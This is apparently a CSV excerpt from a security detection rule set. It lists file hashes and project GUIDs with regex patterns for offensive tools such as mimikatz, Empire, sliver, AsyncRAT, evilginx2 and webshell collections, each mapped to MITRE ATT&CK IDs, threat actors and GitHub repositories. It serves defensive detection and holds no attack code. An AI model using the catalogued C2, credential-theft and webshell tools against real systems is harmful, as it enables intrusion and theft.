"*61254294a879235560c1bcf796ff256bc48d2d90*",".{0,1000}61254294a879235560c1bcf796ff256bc48d2d90.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","27745"
"*6126c4f3c62340df9f501ef98b7266ef2b0fd668a9b286d4bc36eff5e46095bc*",".{0,1000}6126c4f3c62340df9f501ef98b7266ef2b0fd668a9b286d4bc36eff5e46095bc.{0,1000}","offensive_tool_keyword","SharpLocker","get current user credentials by popping a fake Windows lock screen","T1056.002 - T1204.002 - T1071.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Pickfordmatt/SharpLocker","1","0","#filehash","N/A","10","7","616","145","2020-05-27T22:56:34Z","2019-05-31T11:16:38Z","27747"
"*612789c90ec1040d821a985265ea3b2f57e2c8df90b3880752dcb869e45256bc*",".{0,1000}612789c90ec1040d821a985265ea3b2f57e2c8df90b3880752dcb869e45256bc.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","27748"
"*612cfb5648987cf92203adf35d73749091458a4e95cba244873bab5a73586fc7*",".{0,1000}612cfb5648987cf92203adf35d73749091458a4e95cba244873bab5a73586fc7.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","27750"
"*613e5ca15d9bab3a0bad0c5eb8d63894c1b9fbab924385296c29d3b4f3479ee3*",".{0,1000}613e5ca15d9bab3a0bad0c5eb8d63894c1b9fbab924385296c29d3b4f3479ee3.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27757"
"*613fb7b9493ff4c81e4d1cd45e819aed16a090b28b76b9e3081af8df09b5941e*",".{0,1000}613fb7b9493ff4c81e4d1cd45e819aed16a090b28b76b9e3081af8df09b5941e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27758"
"*6142cafb3387eb72f07e6f420aa519affd5fcba4a48459d5084678bc9e661e44*",".{0,1000}6142cafb3387eb72f07e6f420aa519affd5fcba4a48459d5084678bc9e661e44.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","27759"
"*614998828e6d1205980fde58932c9485346edf8e3565669b9a30977d4b952b08*",".{0,1000}614998828e6d1205980fde58932c9485346edf8e3565669b9a30977d4b952b08.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","27761"
"*614b2740412e8c02cf6d98cbda2c73f35073967ab26398c30ed2b8dd3d1fd619*",".{0,1000}614b2740412e8c02cf6d98cbda2c73f35073967ab26398c30ed2b8dd3d1fd619.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27763"
"*614cf381758fcd853c8aa47a2e3910979fde5751d7d0239149f0bcb75c45c4d6*",".{0,1000}614cf381758fcd853c8aa47a2e3910979fde5751d7d0239149f0bcb75c45c4d6.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27764"
"*61573b0cc19ea7bfb6ebe0ad6285d490710a1a09db5e32ab7e029ee466874bcc*",".{0,1000}61573b0cc19ea7bfb6ebe0ad6285d490710a1a09db5e32ab7e029ee466874bcc.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","27765"
"*6157a14aae13101415fbf415379811e8b7bcab80741ed55827bc7ce496f33ac5*",".{0,1000}6157a14aae13101415fbf415379811e8b7bcab80741ed55827bc7ce496f33ac5.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27766"
"*6158ceeafd6c8eaed858e7f763b31444a2d7841a447178809a64dcb73addcf10*",".{0,1000}6158ceeafd6c8eaed858e7f763b31444a2d7841a447178809a64dcb73addcf10.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27767"
"*615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966*",".{0,1000}615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27768"
"*615ef3781d2e2edf36054417bee9292c51737c9782ab174912d18f0b94de2e66*",".{0,1000}615ef3781d2e2edf36054417bee9292c51737c9782ab174912d18f0b94de2e66.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27769"
"*6165159a8e0b04f13dc7ca465f9553e9c5e0a8e601d922c14a60bdd8bcb27ebf*",".{0,1000}6165159a8e0b04f13dc7ca465f9553e9c5e0a8e601d922c14a60bdd8bcb27ebf.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27770"
"*6168269eab4621cee6694242ca0d9e5c006f42467751b1a1b0dc70228894b56d*",".{0,1000}6168269eab4621cee6694242ca0d9e5c006f42467751b1a1b0dc70228894b56d.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","27771"
"*61693b7ce852af0c5704294658176c64c547fc15401f7730261349340c47dba2*",".{0,1000}61693b7ce852af0c5704294658176c64c547fc15401f7730261349340c47dba2.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","27772"
"*6169805c0a2a3eb13298f86e180539edf62ed3d6ba0fe4bfdb2735e814be347a*",".{0,1000}6169805c0a2a3eb13298f86e180539edf62ed3d6ba0fe4bfdb2735e814be347a.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27773"
"*616e73276b689f751dab7542c8b884ec883c54559b4877816bc815b619bc1ce9*",".{0,1000}616e73276b689f751dab7542c8b884ec883c54559b4877816bc815b619bc1ce9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27775"
"*616f3a9958a29d934fd3b1362d7f10d14d1c36b1d5c144c625fc4ab525110133*",".{0,1000}616f3a9958a29d934fd3b1362d7f10d14d1c36b1d5c144c625fc4ab525110133.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","27776"
"*6174e3710ba961a7ac54c781447de43a120224b7def9fb8dd3b15c7e5ccb855d*",".{0,1000}6174e3710ba961a7ac54c781447de43a120224b7def9fb8dd3b15c7e5ccb855d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27777"
"*61796395b041af4d4a777fa249e255fed98462c18287b1c712b8c3ed33081d24*",".{0,1000}61796395b041af4d4a777fa249e255fed98462c18287b1c712b8c3ed33081d24.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","27778"
"*6185f2b2dfd6000213f93bbea91b80af670ced8825626656a61e23a8d5780dcb*",".{0,1000}6185f2b2dfd6000213f93bbea91b80af670ced8825626656a61e23a8d5780dcb.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","27779"
"*618af083df8944b89618a4bed2d4be44f901f3b9659f066d6e210ec0cb92e603*",".{0,1000}618af083df8944b89618a4bed2d4be44f901f3b9659f066d6e210ec0cb92e603.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","27780"
"*618eea76cd6f9ea8adcaa2e96236c352db4a034e52bd3d1a1140012d5510389b*",".{0,1000}618eea76cd6f9ea8adcaa2e96236c352db4a034e52bd3d1a1140012d5510389b.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#filehash","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","27782"
"*6191bb09381c0a8a09db8e7753b7ef89084aaf7557e1605cfeb3abdca258f3ad*",".{0,1000}6191bb09381c0a8a09db8e7753b7ef89084aaf7557e1605cfeb3abdca258f3ad.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#filehash","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","27783"
"*61962c854aa17175796608bf590ae78f3dfcb37a74463a47114b3cdaacc7fc9e*",".{0,1000}61962c854aa17175796608bf590ae78f3dfcb37a74463a47114b3cdaacc7fc9e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27785"
"*619B7612-DFEA-442A-A927-D997F99C497B*",".{0,1000}619B7612\-DFEA\-442A\-A927\-D997F99C497B.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","#GUIDproject","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","27786"
"*619B7612-DFEA-442A-A927-D997F99C497B*",".{0,1000}619B7612\-DFEA\-442A\-A927\-D997F99C497B.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","27787"
"*61b9260e2f3a75f5ab48bf3fc674810f1afddaa4d79bf670c49771e5ed4c5277*",".{0,1000}61b9260e2f3a75f5ab48bf3fc674810f1afddaa4d79bf670c49771e5ed4c5277.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27789"
"*61b990b8dd868920a48c4f599a255173824f5576db1ad712d331dc8f57e5a05a*",".{0,1000}61b990b8dd868920a48c4f599a255173824f5576db1ad712d331dc8f57e5a05a.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","27790"
"*61b9a95658575424bb3e30ed5d83ee9a327924c7fe65d8c6379a86db287b3fea*",".{0,1000}61b9a95658575424bb3e30ed5d83ee9a327924c7fe65d8c6379a86db287b3fea.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27791"
"*61c0810a23580cf492a6ba4f7654566108331e7a4134c968c2d6a05261b2d8a1*",".{0,1000}61c0810a23580cf492a6ba4f7654566108331e7a4134c968c2d6a05261b2d8a1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27792"
"*61c0810a23580cf492a6ba4f7654566108331e7a4134c968c2d6a05261b2d8a1*",".{0,1000}61c0810a23580cf492a6ba4f7654566108331e7a4134c968c2d6a05261b2d8a1.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27793"
"*61c0af74e23b91ced41254e8d701482a157464d4*",".{0,1000}61c0af74e23b91ced41254e8d701482a157464d4.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","27794"
"*61CE6716-E619-483C-B535-8694F7617548*",".{0,1000}61CE6716\-E619\-483C\-B535\-8694F7617548.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","#GUIDproject","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","27796"
"*61CE6716-E619-483C-B535-8694F7617548*",".{0,1000}61CE6716\-E619\-483C\-B535\-8694F7617548.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","#GUIDproject","N/A","10","10","1081","131","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z","27797"
"*61d34e67ae3b3c28281dd29a2a8dd90a7ee3924a2550a0fc7b8eb1c01c7f83c7*",".{0,1000}61d34e67ae3b3c28281dd29a2a8dd90a7ee3924a2550a0fc7b8eb1c01c7f83c7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27798"
"*61d81c3ef4a77bd815d196b650e773ed31a507320c43c52bb9f6798eff4d3413*",".{0,1000}61d81c3ef4a77bd815d196b650e773ed31a507320c43c52bb9f6798eff4d3413.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","27799"
"*61e2497d69dac4b2bd43cb7f8427a81c52eb4f75e0b75b0550b136f3beff877a*",".{0,1000}61e2497d69dac4b2bd43cb7f8427a81c52eb4f75e0b75b0550b136f3beff877a.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","27801"
"*61e6d96902e5eae3155c70f26b7cd5cf544ab5907958a451d34c8ef08688c71a*",".{0,1000}61e6d96902e5eae3155c70f26b7cd5cf544ab5907958a451d34c8ef08688c71a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27802"
"*61f1bf9bb6daa4d45e44e176c22610569cef864f328390b142188b52f9984195*",".{0,1000}61f1bf9bb6daa4d45e44e176c22610569cef864f328390b142188b52f9984195.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27803"
